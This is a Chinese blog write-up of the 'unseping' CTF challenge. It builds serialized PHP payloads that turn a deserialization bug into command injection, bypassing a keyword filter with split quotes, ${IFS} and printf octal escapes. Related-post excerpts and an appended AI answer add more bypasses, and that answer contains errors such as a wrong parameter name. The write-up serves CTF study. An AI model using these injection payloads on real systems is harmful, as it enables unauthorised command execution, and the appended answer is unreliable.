PHP反序列化-CTF-攻防世界-unseping

已于 2023-05-18 10:03:52 修改
阅读量390 收藏 5
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTF 代码审计 反序列化 文章标签: php 代码复审 安全
于 2023-05-18 10:02:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/theenderofroot/article/details/130739578
博客围绕PHP反序列化题目展开,先对源码进行初步审计,分析了case类的魔术方法,包括__wakeup和__destruct方法。通过构造ping方法和输入命令,编写PHP脚本生成payload,使用单双引号、${IFS}、printf等绕过过滤,最终提交payload获取到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

进入题目直接得到源码,初步代码审计后确定是php反序列化题目

大体来看就是创建了一个case类,然后可接受post传来的参数ctf的值并对其进行base64解码以及反序列化

先看魔术方法:

__wakeup方法使用waf方法对$args的内容进行了过滤,过滤掉了| & ; 空格 / cat flag tac php ls

__destruct方法检测ping是否在$method中,并调用了名为$method的方法,以数组$args中的值作为参数

然后ping方法将输入参数作为外部命令进行执行并返回输出结果

综合来看就是通过$method和__construct来调用构造的ping方法,接着通过$args作为输入口进行命令的输入

那么我们在本地编写一个生成payload的php脚本

<?php

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}

$a = new ease("ping",array('l""s'));
$b = serialize($a);

echo $b."</br>";
echo base64_encode(serialize($a));

?>

这里使用了单双引号绕过

生成结果如下

使用hackbar提交此payload,得到

可得flag_1s_here这个目录,那么还需要查看这个目录

<?php

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}

$a = new ease("ping",array('l""s${IFS}f""lag_1s_here'));
$b = serialize($a);

echo $b."</br>";
echo base64_encode(serialize($a));

?>

此处使用了${IFS}绕过了空格过滤,返回结果如下

发现目标文件flag_831b69012c67b35f.php

那么我们就需要构造cat flag_1s_here/flag_831b69012c67b35f.php

<?php

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}

$a = new ease("ping",array('c""at${IFS}f""lag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'));
$b = serialize($a);

echo $b."</br>";
echo base64_encode(serialize($a));

?>

此时这个最终的payload的中,我们采用单双引号绕过正则过滤,${IFS}绕过空格过滤,printf绕过/过滤

把payload提交 

得到flag 

PHP反序列化漏洞+CTF实例
hyq99999的博客
08-09 1389
整理php序列化相关知识点以及在CTF中的实例。
PHP反序列化【原理+CTF实战】
2301_80127209的博客
04-19 1496
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc反弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
PHP反序列化ctf基础知识
最新发布
m0_74786138的博客
05-06 808
/基础定义public $a;//全部可用private $b;//外部不可用,只使用于当前类下//内部和子类可用。
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1856
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
攻防世界——ctf php反序列化
qq_43409582的博客
06-03 3143
php反序列化学习 今天的做了个反序列化CTF题,先拜读大佬们的文章弄懂了啥叫反序列化: serialize:序列化 unserialize: 反序列化 简单解释: serialize 把一个对象转成字符串形式, 可以用于保存 unserialize 把serialize序列化后的字符串变成一个对象 详细的请看:(CVE-2016-7124 https://bugs.php.net/bug.ph...
PHP反序列化学习笔记(CTF
就是我的博客
08-26 1694
ctfphp反序列化学习
攻防世界】十二 --- unserialize3 --- php反序列化
qq_43168364的博客
12-25 647
题目 — unserialize3 一、writeup 一道php反序列化的题 关键点: 当审出存在反序列化漏洞时,我们将对应的那个类拿出到自己的php环境中,先用恶意字符串实例化该类然后用serialize()函数,进行序列化,将序列化好的东西抛出到环境中即可造成反序列化漏洞 当$flag='111’是可以看到flag,通过?code查询字符串来传入需要反序列化的字符串 反序列时会自动调用__wakeup() 函数,导致程序结束执行,因此要绕过 __wakeup() 函数(绕过的方法在知识点中有介绍)
PHP反序列化-CTF-攻防世界-unseping_php反序列化 攻防世界(1)
2301_79985178的博客
04-28 656
先看魔术方法:__wakeup方法使用waf方法对$args的内容进行了过滤,过滤掉了| &;空格 / cat flag tac php ls__destruct方法检测ping是否在method中,并调用了名为method的方法,以数组$args中的值作为参数然后ping方法将输入参数作为外部命令进行执行并返回输出结果综合来看就是通过method和__construct来调用构造的ping方法,接着通过args作为输入口进行命令的输入。
最新PHP反序列化-CTF-攻防世界-unseping_php反序列化 攻防世界,精选网络安全面试真题集锦
2401_84281629的博客
05-14 726
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!😝朋友们如果有需要的话,可以联系领取~
攻防世界--unseping反序列化
m0_67467924的博客
05-22 827
注意,这个变量中,查看文件目录必须使用单引号表示字符串,因为变量序列化后的值是使用的",如果我们也使用双引号,那么序列化后的内容会改变,传输参数后会得到一个空值。查看flag_1s_here文件夹下的内容,注意这里的空格需要使用。均访问失败,查看别人的wp,发现使用otc也就是八进制进行命令执行的绕过。代码审计后,可以知道,我们需要传输ctf的值,然后达到命令执行的效果。\在ascii表中的十进制是47,转为八进制数便是57,因此这里的printf${IFS}"\57"表示的其实就是\。
攻防世界Web题 - unseping 总结
weixin_62871152的博客
11-02 3231
攻防世界-WEB
从一道CTF题学习PHP反序列化漏洞-附件资源
03-02
从一道CTF题学习PHP反序列化漏洞-附件资源
Web:攻防世界unseping
qq_55038440的博客
09-02 1122
ping($ip):内部调用exec($ip, $result)函数,这是一个 PHP 内置函数,用于执行外部程序或系统命令,带有两个参数,前一个是执行外部程序或系统命令,第二个参数是把执行结果存储,通常该参数是数组。__destruct():对象被销毁时候调用,可以看见这个函数的作用是判断method是否等于ping,等于则调用回调函数。__wakeup():是调用unserialize(base64_decode($ctf))时会调用的函数,作用是遍历数组,调用waf函数过滤非法字符。
PHP反序列化CTF例题
bwxzdjn的博客
03-25 6324
用代码审计的方式分析一道典型的存在PHP反序列化漏洞的案例,加深对魔术方法等相关知识的理解。另外,还会和xss跨站脚本的知识进行融合。
ctfshow—web入门—php反序列化
m0_74013288的博客
11-12 1918
虽然序列化时会调用sleep()函数,给username和password赋值为空,但是反序列化时会进入__unserialize中,在最后进行反序列化的时候又会重现赋值,所以可以不用管这个函数,,,invoke函数也没有调用,所以不用管。分析代码,发现需要使ctfShowUser这个类里面的username和password不一样,因为是序列化,对象的属性(变量)和构造方法内的变量赋值我们是可控的,所以我们将username和password改成不一样的就行。查看页面源代码,可以找到我们反序列化的入口;
攻防世界 Web_php_unserialize 反序列化
trytowritecode的博客
10-24 438
昨天帮忙打了场比赛,web题目里也是有反序列化的题,也是利用魔术方法的调用来构造pop链,获取flag但那道题好绕我不会写,然后还有关于json的题,就发现自己好多都没学,真的打一场比赛容易把自己人都打傻掉。 这道题也是看了好久才明白的题目。 废话不多直接上代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file =
CTF php反序列化总结
m0_53567065的博客
11-17 5868
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 5815
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
ctfphp反序列化汇总
2302_78903258的博客
07-19 2299
解题过程:首先需要找到最后的危险函数,看到了在Vox里面的include。然后想要使用include就要调用fun这个函数想要调用fun就要触发__invoke这个魔术方法__invoke() //当脚本尝试将对象调用为函数时触发作为函数就是添加了一个小括号去触发,发现在Petal类中__get方法具备这个调用函数的功能,所以需要去触发__get这个方法。
攻防世界web新手题unseping
03-28
<think>好的,用户需要关于攻防世界Web新手题'unseping'的解题思路或教程。首先,我要回忆这个题目的具体内容。根据用户提供的引用,题目涉及到PHP反序列化漏洞和命令注入,特别是绕过一个__wakeup魔术方法中的WAF黑名单。 首先,题目中提到了代码接收参数cft,进行反序列化后赋值给method和args,然后通过exec执行命令。关键点在于__wakeup函数中的WAF过滤了某些危险字符,但用户需要绕过黑名单执行命令。引用[4]提到黑名单容易被绕过,可能需要使用参数逃逸或其他方法。 接下来,我应该分步骤解析解题过程。第一步是分析代码结构,确认反序列化的触发点。然后,检查__wakeup中的过滤规则,确定哪些字符被禁止。常见的黑名单可能包括空格、分号、管道符等,但可能存在遗漏。例如,使用${IFS}代替空格,或者使用base64编码绕过。 用户提供的引用中有提到使用exec执行args参数,所以构造一个包含恶意命令的序列化对象是必要的。需要确保在反序列化时,method和args参数被正确赋值,并且绕过WAF的检测。此外,可能需要利用PHP反序列化中的特性,比如对象注入或者魔术方法的触发顺序。 另外,引用[2]和[3]涉及PHP弱类型和HTTP Referer,但当前问题可能不需要这些,所以重点放在引用[4]的反序列化和命令注入上。用户可能需要构造特定的payload,例如序列化后的数据,其中args参数使用绕过黑名单的命令,如使用连接符&&或||,或者使用反引号执行命令。 测试过程中可能需要多次尝试不同的绕过技巧,比如用通配符代替特定字符,或者使用编码转换。例如,将命令转换成base64编码,然后通过解码执行。例如,echo bHM= | base64 -d | bash 这样执行ls命令。 最后,确保在解题报告中详细说明每一步的思考过程和使用的技术,帮助用户理解如何应对类似的CTF题目。同时,生成的相关问题应覆盖漏洞分析、绕过技巧和防御方法,以增强学习效果。</think>### 攻防世界Web新手题'unseping'解题思路 #### 题目背景 题目主要考察**PHP反序列化漏洞利用**与**命令注入绕过黑名单过滤**的能力。代码核心逻辑是通过接收参数`cft`反序列化后触发`ping`方法执行系统命令,但`__wakeup`函数中存在WAF黑名单过滤[^4]。 --- #### 解题步骤 1. **代码逻辑分析** - 接收外部参数`cft`,反序列化为对象后赋值给`method`和`args`。 - 当`method`为`ping`时,调用`exec($args)`执行系统命令。 - **关键漏洞点**:`__wakeup`函数中的WAF仅使用黑名单过滤部分危险字符(如`|`、`;`),但未覆盖所有可能的命令注入方式。 2. **绕过WAF黑名单** - **空格绕过**:使用`${IFS}`或`%09`(Tab的URL编码)替代空格,例如`ls${IFS}/`等价于`ls /`。 - **命令拼接**:利用`||`或`&&`绕过分号过滤,例如`cat flag || ls`。 - **通配符使用**:用`*`匹配文件名,例如`cat fla*`代替`cat flag`。 - **Base64编码**:将命令编码后通过管道执行,例如: ```bash echo "bHM=" | base64 -d | bash # 解码后执行"ls" ``` 3. **构造Payload** - 序列化一个对象,设置`method="ping"`,`args`为绕过黑名单的命令。 - **示例PHP序列化代码**: ```php <?php class Example { public $method = "ping"; public $args = "ls${IFS}/"; } echo serialize(new Example()); ?> ``` 输出:`O:7:"Example":2:{s:6:"method";s:4:"ping";s:4:"args";s:5:"ls${IFS}/";}` 4. **发送Payload** - 将序列化后的字符串作为`cft`参数传递,例如: ``` http://target/?cft=O:7:"Example":2:{s:6:"method";s:4:"ping";s:4:"args";s:5:"ls${IFS}/";} ``` - 若服务器返回目录列表,则继续读取flag文件,例如将`args`改为`cat${IFS}/flag.txt`。 --- #### 关键技巧总结 - **反序列化触发点**:需确保对象属性正确赋值以触发`ping`方法。 - **黑名单绕过**:灵活使用替代符号和编码技术。 - **命令结果获取**:若无回显,可通过DNS外带或延时注入判断。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值